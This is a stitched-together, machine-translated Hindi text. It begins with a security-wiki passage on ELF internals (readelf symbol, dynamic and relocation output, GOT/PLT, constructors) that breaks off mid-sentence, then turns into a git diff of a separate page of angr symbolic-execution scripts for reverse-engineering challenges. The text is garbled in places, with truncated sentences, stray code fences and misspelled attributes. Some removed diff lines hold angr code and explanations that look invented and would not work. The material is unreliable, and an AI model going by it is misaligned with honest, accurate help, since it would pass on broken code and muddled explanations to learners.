7: 0000000000000000 0 FUNC GLOBAL DEFAULT UND exit@GLIBC_2.17 (2)
8: 0000000000000000 0 FUNC GLOBAL DEFAULT UND _[...]@GLIBC_2.34 (3)
9: 0000000000000000 0 FUNC GLOBAL DEFAULT UND perror@GLIBC_2.17 (2)
10: 0000000000000000 0 NOTYPE WEAK DEFAULT UND _ITM_deregisterT[...]
11: 0000000000000000 0 FUNC WEAK DEFAULT UND _[...]@GLIBC_2.17 (2)
12: 0000000000000000 0 FUNC GLOBAL DEFAULT UND putc@GLIBC_2.17 (2)
[...]
```
Each symbol entry contains:
* **नाम**
* **बाइंडिंग गुण** (कमजोर, स्थानीय या ग्लोबल): स्थानीय प्रतीक केवल कार्यक्रम द्वारा ही पहुंचा जा सकता है जबकि ग्लोबल प्रतीक कार्यक्रम के बाहर साझा किए जाते हैं। एक कमजोर वस्तु उदाहरण के लिए एक फ़ंक्शन है जिसे एक अलग से ओवरराइड किया जा सकता है।
* **प्रकार**: NOTYPE (कोई प्रकार निर्दिष्ट नहीं), OBJECT (ग्लोबल डेटा वेरिएबल), FUNC (फ़ंक्शन), SECTION (खंड), FILE (डीबगर्स के लिए स्रोत-कोड फ़ाइल), TLS (स्थानीय धागा-स्थायी चर), GNU\_IFUNC (पुनर्स्थापन के लिए अप्रत्यक्ष फ़ंक्शन)
* **खंड** सूची जिसमें यह स्थित है
* **मान** (मेमोरी में पता)
* **आकार**
## गतिशील खंड
```
readelf -d lnstat
Dynamic section at offset 0xfc58 contains 28 entries:
Tag Type Name/Value
0x0000000000000001 (NEEDED) Shared library: [libc.so.6]
0x0000000000000001 (NEEDED) Shared library: [ld-linux-aarch64.so.1]
0x000000000000000c (INIT) 0x1088
0x000000000000000d (FINI) 0x2f74
0x0000000000000019 (INIT_ARRAY) 0x1fc48
0x000000000000001b (INIT_ARRAYSZ) 8 (bytes)
0x000000000000001a (FINI_ARRAY) 0x1fc50
0x000000000000001c (FINI_ARRAYSZ) 8 (bytes)
0x000000006ffffef5 (GNU_HASH) 0x338
0x0000000000000005 (STRTAB) 0x7f0
0x0000000000000006 (SYMTAB) 0x358
0x000000000000000a (STRSZ) 510 (bytes)
0x000000000000000b (SYMENT) 24 (bytes)
0x0000000000000015 (DEBUG) 0x0
0x0000000000000003 (PLTGOT) 0x1fe58
0x0000000000000002 (PLTRELSZ) 960 (bytes)
0x0000000000000014 (PLTREL) RELA
0x0000000000000017 (JMPREL) 0xcc8
0x0000000000000007 (RELA) 0xaa0
0x0000000000000008 (RELASZ) 552 (bytes)
0x0000000000000009 (RELAENT) 24 (bytes)
0x000000000000001e (FLAGS) BIND_NOW
0x000000006ffffffb (FLAGS_1) Flags: NOW PIE
0x000000006ffffffe (VERNEED) 0xa50
0x000000006fffffff (VERNEEDNUM) 2
0x000000006ffffff0 (VERSYM) 0x9ee
0x000000006ffffff9 (RELACOUNT) 15
0x0000000000000000 (NULL) 0x0
```
आवश्यक निर्देशिका इसका संकेत देती है कि कार्यक्रम **उस उल्लिखित पुस्तकालय को लोड करने की आवश्यकता** है ताकि आगे बढ़ सके। जब साझा **पुस्तकालय पूरी तरह से संचालनयोग्य और उपयुक्त हो जाता है**, तो आवश्यक निर्देशिका पूरी हो जाती है।
## पुनर्थान
लोडर को इन्हें लोड करने के बाद आवश्यकताओं को पुनर्थान करना भी आवश्यक है। ये पुनर्थान पुस्तकालय में पुनर्थान सारणी में REL या RELA प्रारूप में दिखाए जाते हैं और पुनर्थानों की संख्या डायनामिक खंडों RELSZ या RELASZ में दी जाती है।
```
readelf -r lnstat
Relocation section '.rela.dyn' at offset 0xaa0 contains 23 entries:
Offset Info Type Sym. Value Sym. Name + Addend
00000001fc48 000000000403 R_AARCH64_RELATIV 1d10
00000001fc50 000000000403 R_AARCH64_RELATIV 1cc0
00000001fff0 000000000403 R_AARCH64_RELATIV 1340
000000020008 000000000403 R_AARCH64_RELATIV 20008
000000020010 000000000403 R_AARCH64_RELATIV 3330
000000020030 000000000403 R_AARCH64_RELATIV 3338
000000020050 000000000403 R_AARCH64_RELATIV 3340
000000020070 000000000403 R_AARCH64_RELATIV 3348
000000020090 000000000403 R_AARCH64_RELATIV 3350
0000000200b0 000000000403 R_AARCH64_RELATIV 3358
0000000200d0 000000000403 R_AARCH64_RELATIV 3360
0000000200f0 000000000403 R_AARCH64_RELATIV 3370
000000020110 000000000403 R_AARCH64_RELATIV 3378
000000020130 000000000403 R_AARCH64_RELATIV 3380
000000020150 000000000403 R_AARCH64_RELATIV 3388
00000001ffb8 000a00000401 R_AARCH64_GLOB_DA 0000000000000000 _ITM_deregisterTM[...] + 0
00000001ffc0 000b00000401 R_AARCH64_GLOB_DA 0000000000000000 __cxa_finalize@GLIBC_2.17 + 0
00000001ffc8 000f00000401 R_AARCH64_GLOB_DA 0000000000000000 stderr@GLIBC_2.17 + 0
00000001ffd0 001000000401 R_AARCH64_GLOB_DA 0000000000000000 optarg@GLIBC_2.17 + 0
00000001ffd8 001400000401 R_AARCH64_GLOB_DA 0000000000000000 stdout@GLIBC_2.17 + 0
00000001ffe0 001e00000401 R_AARCH64_GLOB_DA 0000000000000000 __gmon_start__ + 0
00000001ffe8 001f00000401 R_AARCH64_GLOB_DA 0000000000000000 __stack_chk_guard@GLIBC_2.17 + 0
00000001fff8 002e00000401 R_AARCH64_GLOB_DA 0000000000000000 _ITM_registerTMCl[...] + 0
Relocation section '.rela.plt' at offset 0xcc8 contains 40 entries:
Offset Info Type Sym. Value Sym. Name + Addend
00000001fe70 000300000402 R_AARCH64_JUMP_SL 0000000000000000 strtok@GLIBC_2.17 + 0
00000001fe78 000400000402 R_AARCH64_JUMP_SL 0000000000000000 strtoul@GLIBC_2.17 + 0
00000001fe80 000500000402 R_AARCH64_JUMP_SL 0000000000000000 strlen@GLIBC_2.17 + 0
00000001fe88 000600000402 R_AARCH64_JUMP_SL 0000000000000000 fputs@GLIBC_2.17 + 0
00000001fe90 000700000402 R_AARCH64_JUMP_SL 0000000000000000 exit@GLIBC_2.17 + 0
00000001fe98 000800000402 R_AARCH64_JUMP_SL 0000000000000000 __libc_start_main@GLIBC_2.34 + 0
00000001fea0 000900000402 R_AARCH64_JUMP_SL 0000000000000000 perror@GLIBC_2.17 + 0
00000001fea8 000b00000402 R_AARCH64_JUMP_SL 0000000000000000 __cxa_finalize@GLIBC_2.17 + 0
00000001feb0 000c00000402 R_AARCH64_JUMP_SL 0000000000000000 putc@GLIBC_2.17 + 0
00000001feb8 000d00000402 R_AARCH64_JUMP_SL 0000000000000000 opendir@GLIBC_2.17 + 0
00000001fec0 000e00000402 R_AARCH64_JUMP_SL 0000000000000000 fputc@GLIBC_2.17 + 0
00000001fec8 001100000402 R_AARCH64_JUMP_SL 0000000000000000 snprintf@GLIBC_2.17 + 0
00000001fed0 001200000402 R_AARCH64_JUMP_SL 0000000000000000 __snprintf_chk@GLIBC_2.17 + 0
00000001fed8 001300000402 R_AARCH64_JUMP_SL 0000000000000000 malloc@GLIBC_2.17 + 0
00000001fee0 001500000402 R_AARCH64_JUMP_SL 0000000000000000 gettimeofday@GLIBC_2.17 + 0
00000001fee8 001600000402 R_AARCH64_JUMP_SL 0000000000000000 sleep@GLIBC_2.17 + 0
00000001fef0 001700000402 R_AARCH64_JUMP_SL 0000000000000000 __vfprintf_chk@GLIBC_2.17 + 0
00000001fef8 001800000402 R_AARCH64_JUMP_SL 0000000000000000 calloc@GLIBC_2.17 + 0
00000001ff00 001900000402 R_AARCH64_JUMP_SL 0000000000000000 rewind@GLIBC_2.17 + 0
00000001ff08 001a00000402 R_AARCH64_JUMP_SL 0000000000000000 strdup@GLIBC_2.17 + 0
00000001ff10 001b00000402 R_AARCH64_JUMP_SL 0000000000000000 closedir@GLIBC_2.17 + 0
00000001ff18 001c00000402 R_AARCH64_JUMP_SL 0000000000000000 __stack_chk_fail@GLIBC_2.17 + 0
00000001ff20 001d00000402 R_AARCH64_JUMP_SL 0000000000000000 strrchr@GLIBC_2.17 + 0
00000001ff28 001e00000402 R_AARCH64_JUMP_SL 0000000000000000 __gmon_start__ + 0
00000001ff30 002000000402 R_AARCH64_JUMP_SL 0000000000000000 abort@GLIBC_2.17 + 0
00000001ff38 002100000402 R_AARCH64_JUMP_SL 0000000000000000 feof@GLIBC_2.17 + 0
00000001ff40 002200000402 R_AARCH64_JUMP_SL 0000000000000000 getopt_long@GLIBC_2.17 + 0
00000001ff48 002300000402 R_AARCH64_JUMP_SL 0000000000000000 __fprintf_chk@GLIBC_2.17 + 0
00000001ff50 002400000402 R_AARCH64_JUMP_SL 0000000000000000 strcmp@GLIBC_2.17 + 0
00000001ff58 002500000402 R_AARCH64_JUMP_SL 0000000000000000 free@GLIBC_2.17 + 0
00000001ff60 002600000402 R_AARCH64_JUMP_SL 0000000000000000 readdir64@GLIBC_2.17 + 0
00000001ff68 002700000402 R_AARCH64_JUMP_SL 0000000000000000 strndup@GLIBC_2.17 + 0
00000001ff70 002800000402 R_AARCH64_JUMP_SL 0000000000000000 strchr@GLIBC_2.17 + 0
00000001ff78 002900000402 R_AARCH64_JUMP_SL 0000000000000000 fwrite@GLIBC_2.17 + 0
00000001ff80 002a00000402 R_AARCH64_JUMP_SL 0000000000000000 fflush@GLIBC_2.17 + 0
00000001ff88 002b00000402 R_AARCH64_JUMP_SL 0000000000000000 fopen64@GLIBC_2.17 + 0
00000001ff90 002c00000402 R_AARCH64_JUMP_SL 0000000000000000 __isoc99_sscanf@GLIBC_2.17 + 0
00000001ff98 002d00000402 R_AARCH64_JUMP_SL 0000000000000000 strncpy@GLIBC_2.17 + 0
00000001ffa0 002f00000402 R_AARCH64_JUMP_SL 0000000000000000 __assert_fail@GLIBC_2.17 + 0
00000001ffa8 003000000402 R_AARCH64_JUMP_SL 0000000000000000 fgets@GLIBC_2.17 + 0
```
### स्थैतिक पुनर्स्थापना
यदि **प्रोग्राम पसंदीदा पते से भिन्न स्थान पर लोड** किया गया है (सामान्यत: 0x400000) क्योंकि पता पहले से ही उपयोग में है या **ASLR** या किसी अन्य कारण से, एक स्थैतिक पुनर्स्थापना **सही करती है** जिन पॉइंटर्स के मान बाइनरी को पसंदीदा पते पर लोड होने की उम्मीद हैं।
उदाहरण के लिए किसी भी खंड का प्रकार `R_AARCH64_RELATIV` को पुनर्स्थापना बायस प्लस एडेंड मान परिवर्तित करना चाहिए।
### गतिशील पुनर्स्थापना और GOT
पुनर्स्थापना एक बाह्य प्रतीक (जैसे एक निर्भरता से फ़ंक्शन) को भी संदर्भित कर सकती है। जैसे libC से malloc फ़ंक्शन। तब, जब लोडर libC को एक पते में लोड करता है जहां malloc फ़ंक्शन लोड होता है, तो यह GOT (Global Offset Table) तालिका में इस पते को लिखेगा (पुनर्स्थापना तालिका में सूचित) जहां malloc का पता निर्दिष्ट होना चाहिए।
### प्रक्रिया संबंधन सारणी
PLT खंड को आलसी बाइंडिंग करने की अनुमति देता है, जिसका मतलब है कि फ़ंक्शन के स्थान का समाधान पहली बार किया जाएगा जब यह उपयोग किया जाएगा।
तो जब एक प्रोग्राम malloc को कॉल करता है, वास्तव में यह `malloc` के संबंधित स्थान को PLT में कॉल करता है (`malloc@plt`)। जब यह पहली बार कॉल होता है, तो यह `malloc` का पता स्थानांतरित करता है और इसे स्टोर करता है ताकि अगली बार `malloc` को कॉल किया जाए, उस पते का उपयोग किया जाए बजाय PLT कोड के।
## प्रोग्राम प्रारंभीकरण
प्रोग्राम लोड होने के बाद इसे चलाने का समय है। हालांकि, पहला कोड जो चलाया जाता है **हमेशा `main` नहीं** होता है। यह इसलिए है क्योंकि उदाहरण के लिए C++ में यदि एक **ग्लोबल वेरिएबल किसी क्लास के ऑब्ज
```cpp
#include <stdio.h>
// g++ autoinit.cpp -o autoinit
class AutoInit {
public:
AutoInit() {
printf("Hello AutoInit!\n");
}
~AutoInit() {
printf("Goodbye AutoInit!\n");
}
};
AutoInit autoInit;
int main() {
printf("Main\n");
return 0;
}
```
```
ध्यान दें कि ये ग्लोबल वेरिएबल्स `.data` या `.bss` में स्थित होते हैं लेकिन सूचियों `__CTOR_LIST__` और `__DTOR_LIST__` में ऑब्जेक्ट्स को इनिशियलाइज और डीस्ट्रक्ट करने के लिए क्रम में स्टोर किया जाता है ताकि उनका ट्रैक रखा जा सके।
सी कोड से GNU एक्सटेंशन का उपयोग करके एक ही परिणाम प्राप्त करना संभव है:
```
```c
__attributte__((constructor)) //Add a constructor to execute before
__attributte__((destructor)) //Add to the destructor list
```
कॉम्पाइलर की दृष्टि से, `main` फ़ंक्शन के पहले और बाद में इन क्रियाओं को निष्पादित करने के लिए, `init` फ़ंक्शन और `fini` फ़ंक्शन बनाना संभव है जिन्हें डायनामिक सेक्शन में **`INIT`** और **`FIN`** के रूप में संदर्भित किया जाएगा और ये ELF के `init` और `fini` सेक्शन में रखे जाएंगे।
दूसरा विकल्प, जैसा कि उल्लिखित है, है **`INIT_ARRAY`** और **`FINI_ARRAY`** प्रविष्टियों में **`__CTOR_LIST__`** और **`__DTOR_LIST__`** की संदर्भित करना और इनकी लंबाई को **`INIT_ARRAYSZ`** और **`FINI_ARRAYSZ`** द्वारा दर्शाया जाता है। प्रत्येक प्रविष्टि एक फ़ंक्शन पॉइंटर है जो बिना तार्गेट के कॉल किया जाएगा।
इसके अतिरिक्त, **`INIT_ARRAY`** पॉइंटरों से **पहले** निष्पादित होने वाले **पॉइंटर** के साथ एक **`PREINIT_ARRAY`** भी संभव है।

View file

@ -2,21 +2,21 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**।
</details>
{% hint style="info" %}
यदि प्रोग्राम **`scanf`** का उपयोग करके **stdin से एक साथ कई मान** प्राप्त कर रहा है, तो आपको एक स्थिति उत्पन्न करनी होगी जो **`scanf`** के बाद से शुरू होती है
अगर प्रोग्राम **`scanf`** का उपयोग कर रहा है **stdin से एक साथ कई मान प्राप्त करने** के लिए, तो आपको एक स्थिति उत्पन्न करनी होगी जो **`scanf`** के बाद शुरू हो।
{% endhint %}
### पते तक पहुंचने के लिए इनपुट (पता देते हुए पता देते हुए)
### पता पहुंचने के लिए इनपुट (पता देने वाले पते को दर्शाते हुए)
```python
import angr
import sys
@ -84,11 +84,7 @@ raise Exception('Could not find the solution')
if __name__ == '__main__':
main(sys.argv)
```
### रजिस्ट्री मान्यताएं
Registry values are key-value pairs stored in the Windows registry. They are used to store configuration settings and other important information for the operating system and installed applications. In the Windows registry, values are stored under specific keys, and each value has a unique name and data type.
रजिस्ट्री मान्यताएं विंडोज रजिस्ट्री में संग्रहीत की-मान्यता जोड़ी होती हैं। इन्हें ऑपरेटिंग सिस्टम और स्थापित एप्लिकेशन्स के लिए कॉन्फ़िगरेशन सेटिंग्स और अन्य महत्वपूर्ण जानकारी संग्रहीत करने के लिए उपयोग किया जाता है। विंडोज रजिस्ट्री में, मान्यताएं विशेष कुंजी के तहत संग्रहीत होती हैं, और प्रत्येक मान्यता का एक अद्वितीय नाम और डेटा प्रकार होता है।
### रजिस्ट्री मान्यताएँ
```python
# Angr doesn't currently support reading multiple things with scanf (Ex:
# scanf("%u %u).) You will have to tell the simulation engine to begin the
@ -152,11 +148,7 @@ raise Exception('Could not find the solution')
if __name__ == '__main__':
main(sys.argv)
```
### स्टैक मान
The stack is a data structure used in computer programming to store and manage variables and function calls. In reverse engineering, analyzing the stack values can provide valuable information about the program's execution flow and the values being manipulated.
स्टैक एक डेटा संरचना है जिसका उपयोग कंप्यूटर प्रोग्रामिंग में चर और फंक्शन कॉल को संग्रहीत और प्रबंधित करने के लिए किया जाता है। रिवर्स इंजीनियरिंग में, स्टैक मानों का विश्लेषण करने से प्रोग्राम के निष्पादन फ्लो और मानों के बारे में महत्वपूर्ण जानकारी प्राप्त की जा सकती है।
### स्टैक मानें
```python
# Put bit vectors in th stack to find out the vallue that stack position need to
# have to reach a rogram flow
@ -218,11 +210,11 @@ raise Exception('Could not find the solution')
if __name__ == '__main__':
main(sys.argv)
```
इस स्थिति में, इनपुट `scanf("%u %u")` के साथ लिया गया था और मान `"1 1"` दिया गया था, इसलिए स्टैक के मान **`0x00000001`** उपयोगकर्ता इनपुट से आते हैं। आप देख सकते हैं कि ये मान `$ebp - 8` में शुरू होते हैं। इसलिए, कोड में हमने **`$esp` से 8 बाइट कम कर दिए हैं (क्योंकि उस समय `$ebp` और `$esp`े एक ही मान थे)** और फिर हमने BVS को पुश किया है
इस स्थिति में, इनपुट `scanf("%u %u")` के साथ लिया गया था और मान `"1 1"` दिया गया था, इसलिए स्टैक के मान **`0x00000001`** **उपयोगकर्ता इनपुट** से आते हैं। आप देख सकते हैं कि यह मान `$ebp - 8` में शुरू होता है। इसलिए, कोड में हमने **`$esp` से 8 बाइट कम किए (उस समय `$ebp` और `$esp`ा समान मान था)** और फिर हमने BVS को पुश किया।
![](<../../../.gitbook/assets/image (614).png>)
### स्थिर मेमोरी मान (ग्लोबल वेरिएबल्स)
### स्थायी मेमोरी मान (ग्लोबल वेरिएबल्स)
```python
import angr
import claripy
@ -283,7 +275,7 @@ raise Exception('Could not find the solution')
if __name__ == '__main__':
main(sys.argv)
```
### डायनेमिक मेमोरी के मान (मैलोक)
### डायनामिक मेमोरी मान (मैलोक)
```python
import angr
import claripy
@ -343,32 +335,6 @@ if __name__ == '__main__':
main(sys.argv)
```
### फ़ाइल सिमुलेशन
एनजीआर के माध्यम से फ़ाइल सिमुलेशन करने के लिए, हमें एक फ़ाइल सिस्टम को लोड करने की आवश्यकता होती है। इसके लिए हम `angr.Project()` का उपयोग करते हैं और उसे फ़ाइल पथ के साथ आवंटित करते हैं। फ़ाइल सिमुलेशन के बाद, हम फ़ाइल सिस्टम के स्थिति को पढ़ सकते हैं और उसे संशोधित कर सकते हैं। इसके लिए हम `state.posix.files` का उपयोग करते हैं। इसके बाद, हम फ़ाइल सिस्टम को अपडेट करने के लिए `state.posix.files[fd].content` को सेट कर सकते हैं। फ़ाइल सिमुलेशन के बाद, हम फ़ाइल सिस्टम को बंद करने के लिए `state.posix.close(fd)` का उपयोग करते हैं।
यहां एक उदाहरण है:
```python
import angr
# फ़ाइल सिमुलेशन के लिए फ़ाइल सिस्टम लोड करें
proj = angr.Project("/path/to/file")
# फ़ाइल सिस्टम की स्थिति पढ़ें
state = proj.factory.entry_state()
file_state = state.posix.files[fd]
# फ़ाइल सिस्टम को संशोधित करें
file_state.content = b"New content"
# फ़ाइल सिस्टम को अपडेट करें
state.posix.files[fd] = file_state
# फ़ाइल सिस्टम बंद करें
state.posix.close(fd)
```
इस उदाहरण में, हम `angr.Project()` का उपयोग करके फ़ाइल सिस्टम को लोड करते हैं। फ़ाइल सिस्टम की स्थिति को पढ़ने के लिए हम `state.posix.files[fd]` का उपयोग करते हैं और उसे संशोधित करने के लिए हम `file_state.content` को सेट करते हैं। फ़ाइल सिस्टम को अपडेट करने के बाद, हम `state.posix.close(fd)` का उपयोग करके फ़ाइल सिस्टम को बंद करते हैं।
```python
#In this challenge a password is read from a file and we want to simulate its content
@ -424,7 +390,7 @@ if __name__ == '__main__':
main(sys.argv)
```
{% hint style="info" %}
ध्यान दें कि संकेतात्मक फ़ाइल में निरंतर डेटा को संकेतात्मक डेटा के साथ मिलाकर भी शामिल किया जा सकता है:
ध्यान दें कि प्रतीकात्मक फ़ाइल में स्थायी डेटा भी हो सकता है जो प्रतीकात्मक डेटा के साथ मिला हुआ हो।
```python
# Hello world, my name is John.
# ^ ^
@ -447,11 +413,11 @@ main(sys.argv)
```
{% endhint %}
### नियंत्रण लागू करना
### बाधाएं लागू करना
{% hint style="info" %}
कभी-कभी साधारण मानवीय कार्य जैसे कि 16 अक्षरों की लंबाई के 2 शब्दों की तुलना करना (लूप के माध्यम से) अंग्र को बहुत कीमती होता है क्योंकि इसे शाखाएं बनानी होती हैं जो गणना करती हैं एक शाखा प्रति if: `2^16`\
इसलिए, यह आसान होता है कि **angr को पिछले बिंदु पर पहुंचाएं** (जहां वास्तविक कठिनाई का हिस्सा पहले से ही किया गया था) और **उन नियंत्रणों को मैन्युअल रूप से सेट करें**।
कभी-कभी साधारण मानव क्रियाएं जैसे कि 16 अक्षरों की लंबाई के 2 शब्दों की तुलना करना (लूप), **अंग्र** को बहुत कीमत पर पड़ता है क्योंकि यह शाखाएं **गणना** करने की आवश्यकता होती है क्योंकि यह 1 शाखा प्रति यदि उत्पन्न करता है: `2^16`\
इसलिए, यह अधिक सरल है कि **अंग्र से पिछले बिंदु तक पहुंचें** (जहां वास्तव में कठिन हिस्सा पहले से ही किया गया था) और **उन बाधाओं को मैन्युअल रूप से सेट करें**।
{% endhint %}
```python
# After perform some complex poperations to the input the program checks
@ -524,17 +490,17 @@ if __name__ == '__main__':
main(sys.argv)
```
{% hint style="danger" %}
कुछ स्थितियों में आप **वेरिटेस्टिंग** को सक्रिय कर सकते हैं, जो समान स्थितियों को मिलाकर अनावश्यक शाखाओं को बचाने और समाधान ढूंढने में मदद करेगा: `simulation = project.factory.simgr(initial_state, veritesting=True)`
कुछ स्थितियों में आप **veritesting** को सक्रिय कर सकते हैं, जो समान स्थितियों को मिलाएगा, बिना उपयोगहीन शाखाओं को बचाने और समाधान ढूंढने के लिए: `simulation = project.factory.simgr(initial_state, veritesting=True)`
{% endhint %}
{% hint style="info" %}
इन स्थितियों में आप एंग्र को कुछ ऐसा दे सकते हैं जिसे यह आसानी से समझ सके
इन स्थितियों में एक और चीज जो आप कर सकते हैं, वह है **फ़ंक्शन को हुक करना जिससे angr को कुछ ज्यादा समझने में सुविधा हो**
{% endhint %}
### सिम्युलेशन प्रबंधक
### सिमुलेशन प्रबंधक
कुछ सिम्युलेशन प्रबंधक अन्यों से अधिक उपयोगी हो सकते हैं। पिछले उदाहरण में एक समस्या थी क्योंकि कई उपयोगी शाखाएं बनाई गईं थीं। यहां, **वेरिटेस्टिंग** तकनीक उन्हें मिलाएगी और समाधान ढूंढेगी।\
इस सिम्युलेशन प्रबंधक को निम्नलिखित तरीके से सक्रिय किया जा सकता है: `simulation = project.factory.simgr(initial_state, veritesting=True)`
कुछ सिमुलेशन प्रबंधक अन्यों से अधिक उपयोगी हो सकते हैं। पिछले उदाहरण में एक समस्या थी क्योंकि कई उपयोगी शाखाएँ बनाई गई थीं। यहाँ, **veritesting** तकनीक उन्हें मिलाएगी और समाधान ढूंढेगी।\
यह सिमुलेशन प्रबंधक भी इस तरह सक्रिय किया जा सकता है: `simulation = project.factory.simgr(initial_state, veritesting=True)`
```python
import angr
import claripy
@ -572,9 +538,7 @@ raise Exception('Could not find the solution')
if __name__ == '__main__':
main(sys.argv)
```
### एक फंक्शन के एक कॉल को हुक करना/बाईपास करना
इस उदाहरण में, हम एक फंक्शन के एक कॉल को हुक करने या बाईपास करने के लिए एक तकनीक का उपयोग करेंगे।
### फ़ंक्शन को एक कॉल को हुक करना/बाईपास करना
```python
# This level performs the following computations:
#
@ -642,11 +606,7 @@ raise Exception('Could not find the solution')
if __name__ == '__main__':
main(sys.argv)
```
### फंक्शन को हुक करना / सिमप्रोसीजर
फंक्शन को हुक करना एक तकनीक है जिसका उपयोग आप एक फंक्शन को बदलने या उसके व्यवहार को नियंत्रित करने के लिए कर सकते हैं। इसका उपयोग आपको एक फंक्शन के विशेष भाग को बदलने की अनुमति देता है, जैसे कि उसके पैरामीटर या रिटर्न मान को बदलना। इसके लिए, आपको फंक्शन को हुक करने के लिए उचित तकनीक का उपयोग करना होगा, जैसे कि एक सिमप्रोसीजर।
एक सिमप्रोसीजर एक विशेष प्रकार का हुक होता है जो आपको एक फंक्शन के व्यवहार को नियंत्रित करने की अनुमति देता है। इसका उपयोग आप एक फंक्शन के विशेष भाग को बदलने के लिए कर सकते हैं, जैसे कि उसके पैरामीटर या रिटर्न मान को बदलना। इसके लिए, आपको एक सिमप्रोसीजर को फंक्शन के साथ जोड़ने की आवश्यकता होगी, जिससे आप उसके व्यवहार को नियंत्रित कर सकें।
### फ़ंक्शन को हुक करना / सिमप्रोसीजर
```python
# Hook to the function called check_equals_WQNDNKKWAWOLXBAC
@ -730,39 +690,7 @@ raise Exception('Could not find the solution')
if __name__ == '__main__':
main(sys.argv)
```
### कई पैरामीटर्स के साथ scanf को सिम्युलेट करें
यदि आप किसी प्रोग्राम को रिवर्स इंजीनियर कर रहे हैं और आपको scanf के साथ कई पैरामीटर्स को सिम्युलेट करने की आवश्यकता होती है, तो आप निम्नलिखित तरीके का उपयोग कर सकते हैं:
```python
import angr
# प्रोग्राम को लोड करें
project = angr.Project("/path/to/program")
# इनपुट स्ट्रिंग के लिए सिम्युलेटर बनाएं
simgr = project.factory.simulation_manager()
# प्रोग्राम के रजिस्टर को सेट करें
simgr.active[0].regs.rdi = 0x12345678 # पहला पैरामीटर
simgr.active[0].regs.rsi = 0xabcdef01 # दूसरा पैरामीटर
simgr.active[0].regs.rdx = 0x98765432 # तीसरा पैरामीटर
# प्रोग्राम को इंजेक्ट करें
simgr.explore(find=0xdeadbeef)
# इंजेक्शन के बाद प्रोग्राम की स्थिति देखें
if simgr.found:
solution_state = simgr.found[0]
print("पाया गया समाधान:")
print(solution_state.posix.dumps(0)) # प्रथम पैरामीटर
print(solution_state.posix.dumps(1)) # दूसरा पैरामीटर
print(solution_state.posix.dumps(2)) # तीसरा पैरामीटर
```
इस उदाहरण में, हम `angr` लाइब्रेरी का उपयोग करके प्रोग्राम को लोड करते हैं और एक सिम्युलेशन मैनेजर बनाते हैं। फिर हम प्रोग्राम के रजिस्टर को सेट करते हैं जिसमें हम वांछित पैरामीटर्स को सेट करते हैं। अंत में, हम प्रोग्राम को इंजेक्ट करते हैं और इंजेक्शन के बाद प्रोग्राम की स्थिति देखते हैं। यदि समाधान मिलता है, तो हम प्राप्त समाधान को प्रिंट करते हैं।
ध्यान दें कि यह उदाहरण एक आंकड़ा तक प्रोग्राम को सिम्युलेट करने के लिए है और यह वास्तविक प्रोग्राम को नहीं चला सकता है। आपको अपने वास्तविक प्रोग्राम के लिए उपयुक्त रजिस्टर और पैरामीटर्स को सेट करने की आवश्यकता होगी।
### कई पैरामीटर के साथ scanf का अनुकरण
```python
# This time, the solution involves simply replacing scanf with our own version,
# since Angr does not support requesting multiple parameters with scanf.
@ -824,9 +752,7 @@ raise Exception('Could not find the solution')
if __name__ == '__main__':
main(sys.argv)
```
### स्थिर बाइनरी
